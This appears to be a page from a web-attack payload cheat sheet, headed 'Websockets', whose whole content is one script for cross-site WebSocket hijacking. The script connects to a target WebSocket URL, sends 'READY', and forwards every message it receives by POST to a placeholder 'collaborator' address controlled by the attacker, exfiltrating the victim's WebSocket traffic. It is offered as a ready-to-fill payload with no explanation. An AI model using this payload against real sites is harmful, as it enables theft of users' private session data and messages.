Websockets

<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('<https://your-collaborator-url>', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

Last updated